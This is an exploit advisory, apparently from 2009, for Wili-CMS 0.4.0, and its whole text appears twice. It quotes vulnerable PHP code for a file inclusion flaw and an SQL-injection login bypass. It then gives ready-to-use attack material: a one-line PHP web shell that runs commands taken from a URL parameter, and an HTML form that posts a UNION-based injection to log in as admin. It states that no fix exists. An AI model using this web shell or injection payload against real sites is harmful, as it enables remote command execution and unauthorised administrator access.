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Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Wili-CMS
[+] Version: 0.4.0
[+] Website: http://wili-cms.sourceforge.net/

[+] Bugs: [A] Multiple Remote/Local File Inclusion
          [B] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 06 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


[+] Menu

1) Bugs
2) Code
3) Fix


[+] Bugs

- [A] Multiple Remote/Local File Inclusion

[-] Requisites: none
[-] File affected: index.php

This bug allows a guest to include remote and
local files and however to exec remote commands.


if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
    include( $globals['content_dir'].$globals['template_dir']."error404.php" );


include( template_file( $globals['root_template'] ) );

- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lib/admin/init_session.php

This bug allows a guest to login as admin.


$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];


$sth = mysql_query(
       "SELECT id
        FROM ".$globals['userstable']."
        WHERE username='".$_SESSION['uname']."'
        AND adminflag=1
        AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );

      // password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
        $globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);

    if ( $globals['admin_modus'] == "loggedin" ) {
         // log login
         db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
         // goto welcome page if skipwelcome flag of this user is not set
         if ( !(mysql_result( $userh, 0, 1 )) ) {
           $_REQUEST['npage'] = get_firstpage( "adminwelcome" );
         $globals['admin_modus'] = "";



[+] Code

- [A] Multiple Remote/Local File Inclusion

shell.txt: <?php system($_GET['cmd']); ?>



- [B] Authentication Bypass

    <title>Wili-CMS 0.4.0 Authentication Bypass Exploit</title>
    <form action="http://www.site.com/path/admin.php"; method="POST">
      <input type="text" name="uname" value="admin">
      <input type="hidden" name="password" value="1') UNION ALL SELECT 1#">
      <input type="hidden" name="mode" value="loggedin">
      <input type="hidden" name="npage" value="1">
      <input type="submit" value="Exploit">


[+] Fix

No fix.


Salvatore "drosophila" Fresta
*******   Salvatore "drosophila" Fresta   *******

[+] Application: Wili-CMS
[+] Version: 0.4.0
[+] Website: http://wili-cms.sourceforge.net/

[+] Bugs: [A] Multiple Remote/Local File Inclusion
          [B] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 06 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


[+] Menu

1) Bugs
2) Code
3) Fix


[+] Bugs

- [A] Multiple Remote/Local File Inclusion

[-] Requisites: none
[-] File affected: index.php

This bug allows a guest to include remote and
local files and however to exec remote commands.


if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
    include( $globals['content_dir'].$globals['template_dir']."error404.php" );

include( template_file( $globals['root_template'] ) );

- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lib/admin/init_session.php

This bug allows a guest to login as admin.


$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password'] : 
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ? 
$_REQUEST['uname'] : $_SESSION['uname'];

$sth = mysql_query( 
       "SELECT id 
        FROM ".$globals['userstable']."
        WHERE username='".$_SESSION['uname']."' 
        AND adminflag=1 
        AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );
      // password ok -> login    
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
        $globals['user'] = mysql_result( $userh = mysql_query( "SELECT id, 
skipwelcome FROM ".$globals['userstable']." WHERE 
username='".$globals['username']."'", $globals['dbh'] ),0,0);
    if ( $globals['admin_modus'] == "loggedin" ) {  
         // log login
         db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );         
         // goto welcome page if skipwelcome flag of this user is not set
         if ( !(mysql_result( $userh, 0, 1 )) ) {
           $_REQUEST['npage'] = get_firstpage( "adminwelcome" );
         $globals['admin_modus'] = "";


[+] Code

- [A] Multiple Remote/Local File Inclusion

shell.txt: <?php system($_GET['cmd']); ?>



- [B] Authentication Bypass

    <title>Wili-CMS 0.4.0 Authentication Bypass Exploit</title>
    <form action="http://www.site.com/path/admin.php"; method="POST">
      <input type="text" name="uname" value="admin">
      <input type="hidden" name="password" value="1') UNION ALL SELECT 1#">
      <input type="hidden" name="mode" value="loggedin">
      <input type="hidden" name="npage" value="1">
      <input type="submit" value="Exploit">


[+] Fix

No fix.
